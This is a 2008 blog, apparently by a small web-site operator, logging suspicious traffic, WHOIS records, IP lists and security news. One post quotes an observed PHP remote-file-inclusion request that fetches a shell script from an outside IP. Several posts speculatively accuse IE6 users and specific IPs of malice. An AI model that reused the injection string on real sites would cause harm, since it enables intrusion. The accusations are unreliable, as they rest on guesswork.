Monday, March 31, 2008

Further Convinced IE6 is used for maliciousness

I am further convinced that users of IE6 or their computers are up to no good and that at least a part of your IE6 traffic is bogus and used for purposes other than for people to learn about and buy your products and services.

Not only do most IE6 users in general not upgrade their browser after being locked out of the site which was done as a test to see if this traffic is legit - most of the traffic is a one-off hit and not by users of these sites who are typically frequent visitors looking for updated information. Long time legitimate users are not typically the ones using IE6 - it is the random one-off visitor hitting odd sites that it is very strange they would be trafficking in the first place.

For instance, there's an IP in Brazil - a known big source of spam - hitting a site over and over again with different browsers probably trying to decipher how to crack through this blocking. They are looking at a site with Christmas related items. It is doubtful that at this time of year someone in Brazil is trying that hard to view Christmas decorations in the US that are not even for sale online.

As a side note a lot of people from Brazil travel to a location related to a travel booking site we run - could this be a travel agent or criminal in Brazil trying to copy the site and direct traffic to them instead of us?

Here's the IP: 201.77.3.1

inetnum: 201.77.0/20
aut-num: AS28650
abuse-c: RFS185
owner: Dilmar Antonio Simonetti
ownerid: 031.743.818/0001-28
responsible: Dilmar Simonetti
owner-c: RFS185
tech-c: RFS185
inetrev: 201.77.0/21
nserver: ns.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
nserver: ns2.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
created: 20060607
changed: 20060607

nic-hdl-br: RFS185
person: Rogerio Ferreira dos Santos
e-mail: roger@simonet.com.br
created: 20010816
changed: 20060307

Saturday, March 29, 2008

Google Gets Into Security Outsourcing

This is very interesting and I like it, for the most part, because I think a company with lots of money will need to do this to really be effective:

Google bought Postini and is offering small businesses a way to "outsource" their security. Now, there are many aspects of security and this does not exactly cover the things I mentioned in my last post. That's a different animal. The portion of security in this case is scanning emails before they get to you and web site responses before they get to you.

Outsourced Security

The thing about Google, is that they have a lot of really smart people and money. And I have a feeling Google might have a little bit of a bent to help make the world a better place. The way Google can really help would be to consolidate anonymous access of all this data coming from bots and hacked computers, spammers, scammers and criminals, and use it to prosecute the offenders.

This is not an easy task as many criminals are outside the US or perhaps inside the US doing their dirty work through people outside the US or perhaps outside the US masquerading as people inside the US. Anything crossing international borders is going to be tricky and probably involve some politicians.

And in general, tackling this big problem is going to cost a lot of money to stay on top of the analysis to do this thing right - and really stay ahead of the hackers - who are some really smart brains whose day is spent 100% trying to figure out how to crack your password, hack your system, steal the money in your bank account, divert your business to themselevs, etc.

There is one thing about this solution that bothers me however. If Google sets up a bunch of proxy servers for small businesses - are they going to pass through legitimate information about the person making a request on your web site? Or will all the requests look like they are coming from Google? That gives Google a strangle hold on a lot of marketing people which is not a good idea. It also sets up the service to work like AOL which a haven for hackers and criminals who want to hide their identity. That is my only concern so far about this service, which is otherwise great.

The Cost of Cheap Web Sites

Ok so you figured it out and you threw your cheap PHP site online and you think you're cool right? But if you're not monitoring you site carefully and updating to get all the latest patches - constantly - you may be aiding and abetting hackers, phishers and spammers.

http://www.networkworld.com/news/2008/032808-google-search-behind-most-phishing.html

If you don't know what you're doing - use a system from a company that has security built in and handles all the hosting and security for you - man in the middle, sql injection, cross site scripting, bot traffic filtering, code injection, OS updates, web platform updates and constant monitoring of security issues - and help make the world a better place. There are places you can get "cheap" web sites if you really want one without creating these problems for the rest of the world.

The problem is really that all these people who go out and get cheap and free web sites and don't know what they are doing created headaches for the rest of the world - who foots the bill when their web site gets hacked and is used for malicious purposes.

IE6 - Fake Traffic or Surrogate Traffic

This is a prediction which I cannot exactly prove yet, but I am guessing something like this might be going on - and perhaps this is old news because I don't know every security vulnerability that exists for IE6.

My guess is that much of your traffic coming to your web server from IE6 may in fact not be traffic from the person who owns that computer or server. I am guessing that much of the IE6 traffic you see in your logs is a third party who has hijacked that machine, browser, or maybe a session or whatever to hide their true identity while sniffing around for security problems, hijacking your web site content, or possibly blocking search engines from getting to your site to hurt your rankings...not sure but there's something really weird about all the IE6 traffic on my server.

And even more odd is that when this traffic is blocked with a request to upgrade the browser, the user of that machine doesn't upgrade. I find it hard to believe that with all the security hype and fear of stolen identity and access to bank accounts that these users refuse to upgrade their browser. I think maybe these are old machines sitting around that have a browser on them that isn't even used, perhaps, and some hacker has gotten onto it and uses it to hide the true source of the traffic.

Friday, March 28, 2008

PHP hack - shell - 216.191.16.12

IP address 82.210.107.191 is attempting get to one of our urls with a url that ends in a php page like this:

main.php?pageURL=http://216.191.16.12/.shell/site/iyes.txt??

Apparently there is another PHP hack on the loose.

Thursday, March 27, 2008

Supsicious and possibly related IPs

I think at least some of these computers have something in common - like they are hacked or run by hackers. In particular the IP address 96.10.27.184 is clearly trying to alter the user agent in their request. I am pretty sure some of the others are doing the same. A few of them may be people who just need to update their browsers to the latest version.

Another interesting thing is that most of these visits were referred by Google for whatever that is worth.

3/27/2008 17:05 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:00 206.28.72.1
3/27/2008 16:23 75.165.40.66
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:00 75.213.19.243
3/27/2008 15:33 208.152.32.185
3/27/2008 15:33 208.152.32.185
3/27/2008 15:32 96.10.27.184
3/27/2008 15:25 206.188.43.45
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:21 65.122.125.226
3/27/2008 15:21 65.122.125.226
3/27/2008 15:20 199.245.127.5
3/27/2008 15:20 65.122.125.226
3/27/2008 15:20 65.122.125.226
3/27/2008 15:19 199.245.127.5
3/27/2008 15:16 208.100.138.5
3/27/2008 15:15 69.88.119.126
3/27/2008 15:15 69.88.119.126
3/27/2008 15:14 69.88.119.126
3/27/2008 15:07 68.178.99.210
3/27/2008 14:50 65.101.142.202
3/27/2008 14:50 96.10.27.184
3/27/2008 14:48 65.101.142.202
3/27/2008 14:48 65.101.142.202
3/27/2008 14:47 65.101.142.202

Wednesday, March 26, 2008

Offshore Fraud Alerts

Watching American Greed on CNBC and listening to all the scams people fall for (if it's too good to be true...it probably is) and learned about this web site Offshore Alert which has information on various offshore scams.

Sunday, March 23, 2008

IP Range lists Two Country Codes

This IP range list two country codes - Belgium and The Netherlands

inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL

IP Range lists two country codes

This IP range lists two countries - Belgium and The Netherlands:

inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL

Saturday, March 22, 2008

Do you know where your email address is listed?

Go to Google and type in your email address.

If you don't like where it's listed, report it to Google and the web site owner to try to get it removed.

Good luck.

Many news groups publish people's names and email addresses on web sites - and not only that they publish these news groups get copied to all kinds of third party sites - so your name and email address is spread all over search engine results.

This makes it extremely easy for hackers and spammers who scan web pages to pick up your email address all over the place.

One site changed all the email addresses to something like this name <at> emailaddress.com

That doesn't really hide the address.

Try to contact these web sites and ask them to remove your name and email address. Some of them will do it. After many contacts some web sites still have not responded and other web sites have said they will remove the pages but it takes forever for them to remove it and even longer for it to be removed from search engine caches so it doesn't show up in search engine listings.

Should it be legal to post someone's private contact information without consent?

Sunday, March 16, 2008

Code Injected Into Trend Micro Web Site

Trend Micro has some security software among other things so it is ironic that their web site was the victim of a code injection attack which apparently sent people to some evil sites in China. This reinforces that web site hacks are more prevalent than most companies realize or admit: Trend Micro Web Site Hacked

Hack - quoted identifies - SQL 2000

Depending on how sql identifiers are set in sql 2000, certain SQL injection hacks related to what is explained here may be a problem:

http://www.sqlteam.com/article/quoted-identifiers-in-sql-server-2000

Apnic IP reports US address

This IP Range should be moved to Arin or fixed to indicate the correct location:

Inetnum: 203.187.128.0 - 203.187.159.255
netname: INFONET-AP-02
descr: BT-Infonet, Internet Service Provider
descr: 2160 E. Grand Ave. El Segundo, CA90245
country: US

Spam Viruses on the Rise

Google reports that Spam Viruses are on the rise in this report from eweek:

Spam Viruses on the Rise

And on that note I must say my mailbox is even more full of spam messages with attachments and the particularly spammed mailbox is on a bunch of social networking and job related web sites and a few user group mailing lists, and of course mailing lists like eweek and other Internet industry mailing lists.

Other than that I barely use that email address for communication anymore due to all the problems.

So is all this spam the result of putting my name on some social networking site somewhere?

As a matter of fact I tried out Facebook for a while just to see what all the hubbub was about and I got sent so many of these stupid applications and postings from friends that I just did not believe were legitimately from my friends. I would see that two random and unrelated people were challenged to a game, for instance or received a similar post and I started to wonder if some of those things were fake. I'm sure they were, but basically I never clicked on any of them (sorry all you facebook friends out there) because I know that these apps from random sites could contain things that are harmful to my computer and who knows what is in them or where they came from...and even the ones I did sign up for from bigger name software makers I wondered about.

So yeah, I really believe this and I wonder if the makers of some of the executive type social networking sites are actually using that information illegally - or those systems are getting hacked for that purpose, which is why in part I do not fully use them.

Wednesday, March 12, 2008

Top 10 Web Vulnerabilities - Q4 2007

Report of top 10 web vulnerabilities - Q4 2007 states that 29% of vulernabilities are attributable to network and infrastructure, while 71% are attributable to both open source and commercial web applications.

PHP represents 30% of all vulnerabilities. Ahem. I have mentioned this before and I still think PHP is a majorly hacked platform because people think it is "easy and cheap" and well, yes, until you get hacked. That's not to say PHP cannot be secure. It's just that the relative ease of tacking together an application that can be blown over in the wind makes it attractive for use by people who want to think they are programmers without understanding the underlying fundamentals of programming, software, web applications or security.

But then, there are many other serious applications, vendors and open source tools that have been hacked on the top 10 list, such as the #1 issue - OpenSSL - a technology meant to encrypt your data in transit as a means of security.

Spyware Developer Pays $330,000 +

Spyware developer / hacker pays for creating spyware that infected millions of computers.

Cisco Will Send Patches On Routine Basis

Cisco to patch routers on regular schedule, 03/11/2008 Following the lead of Microsoft and Oracle, Cisco Systems will start releasing security patches for some of its products on a schedule.

Friday, March 07, 2008

Critcal Java Security Patches

Secunia has a bunch of Java updates today for an issue that can cause remote code execution and DOS:

http://secunia.com/advisories/29239/

Wednesday, March 05, 2008

Old Browsers Are Security Risk

This is probably old news for most people but if someone is using an old browser in some cases it may be that an SSL certificate will not deliver 128 bit encryption. Here's the info from Verisign's web site:

Even though an SSL Certificate is capable of 128-bit or 256-bit encryption, many millions still use older computer systems that are incapable of strong encryption. (Building Blocks of Transparent Web Security: Server-Gated Cryptography, Yankee Group, 2005.) These legacy browsers and operating systems fail to step up to strong encryption without an SGC-enabled SSL Certificate:

Certain Internet Explorer browser versions from 4.01 to 5.01
Certain Netscape browser versions from 4.07 to 4.72
Many Windows 2000 systems using Internet Explorer
Internet Explorer browser versions prior to 3.02 and Netscape browser versions prior to 4.02 are not capable of 128-bit encryption with any SSL Certificate.


Verisign SSL Information

Choices are to use that way overpriced green bar SSL certificate that many vendors are not yet adopting, or block out old browsers from your web server and ask them to upgrade. The latter is not fool-proof but if someone wants to let their data get hacked that is their own problem.

Your virus scanner can't find this one...

Here's a root kit that is nearly impossible to detect:

Mebroot Root Kit

And once again, the infamous IT experts all over this country said this type of thing was hypothetically possible but beyond the reach of most malware writers.

Verisign says 5000 people were discovered to be infected since this was discovered in December.

And check out what you have to do to detect it.

This thing can be installed onto your machine in a drive by visit to a web site.